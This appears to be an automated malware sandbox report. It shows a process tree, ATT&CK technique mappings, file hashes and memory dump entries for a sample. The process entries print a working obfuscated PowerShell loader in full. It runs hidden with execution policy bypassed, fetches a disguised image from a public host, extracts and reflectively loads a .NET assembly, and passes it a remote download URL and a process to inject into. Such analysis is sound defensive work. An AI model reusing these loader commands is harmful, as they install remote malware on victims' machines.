∹ ˂ ≷ ㏌D0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌bwBh┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌ZQBk┐ ∹ ˂ ≷ ㏌EE┐ ∹ ˂ ≷ ㏌cwBz┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQBi┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌eQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Ec┐ ∹ ˂ ≷ ㏌ZQB0┐ ∹ ˂ ≷ ㏌FQ┐ ∹ ˂ ≷ ㏌eQBw┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌K┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌n┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌bgBs┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌Yg┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌Tw┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Eg┐ ∹ ˂ ≷ ㏌bwBt┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌Jw┐ ∹ ˂ ≷ ㏌p┐ ∹ ˂ ≷ ㏌Ds┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bt┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bo┐ ∹ ˂ ≷ ㏌G8┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌D0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌eQBw┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌LgBH┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BN┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bo┐ ∹ ˂ ≷ ㏌G8┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌o┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌VgBB┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌Jw┐ ∹ ˂ ≷ ㏌p┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌SQBu┐ ∹ ˂ ≷ ㏌HY┐ ∹ ˂ ≷ ㏌bwBr┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌K┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌dQBs┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌L┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌Fs┐ ∹ ˂ ≷ ㏌bwBi┐ ∹ ˂ ≷ ㏌Go┐ ∹ ˂ ≷ ㏌ZQBj┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌WwBd┐ ∹ ˂ ≷ ㏌F0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌o┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌B4┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌LgBl┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌ZQBl┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌aQBm┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌YgBi┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌YgBl┐ ∹ ˂ ≷ ㏌Hc┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌YQBt┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌DE┐ ∹ ˂ ≷ ㏌Lg┐ ∹ ˂ ≷ ㏌2┐ ∹ ˂ ≷ ㏌DE┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌DM┐ ∹ ˂ ≷ ㏌Lg┐ ∹ ˂ ≷ ㏌y┐ ∹ ˂ ≷ ㏌Dk┐ ∹ ˂ ≷ ㏌MQ┐ ∹ ˂ ≷ ㏌v┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌OgBw┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bo┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌s┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌JwBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌cwBh┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌aQB2┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bv┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌s┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌JwBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌cwBh┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌aQB2┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bv┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌s┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌JwBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌cwBh┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌aQB2┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bv┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌L┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌n┐ ∹ ˂ ≷ ㏌EE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bk┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌bgBQ┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌bwBj┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌cwBz┐ ∹ ˂ ≷ ㏌DM┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌n┐ ∹ ˂ ≷ ㏌Cw┐ ∹ ˂ ≷ ㏌Jw┐ ∹ ˂ ≷ ㏌n┐ ∹ ˂ ≷ ㏌Ck┐ ∹ ˂ ≷ ㏌KQ┐ ∹ ˂ ≷ ㏌=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('┐ ∹ ˂ ≷ ㏌','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.eeeelifbbbbbewmadam/241.612.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bd76bd52c268841cbd71e42f7aa519bc

SHA1
971765a28701cf51f81ba06d402f1e740e8072af

SHA256
6a44147b9f272ca78dcb1c9db7ffabdde992bb8d212e91f2f86c4b557c39d73c

SHA512
bb69b23ac61377bdfb7d84d555fdbf375e7cbcbcddff066521717359ba1abb2d5f863791602b06dae78d1bed583f2d8b3db6dc380d71512626e993ce21a42002

Download Submit
memory/1704-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp

Filesize
4KB

Download
memory/1704-5-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/1704-7-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/1704-6-0x0000000002690000-0x0000000002698000-memory.dmp

Filesize
32KB

Download
memory/1704-8-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/1704-9-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/1704-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/1704-16-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing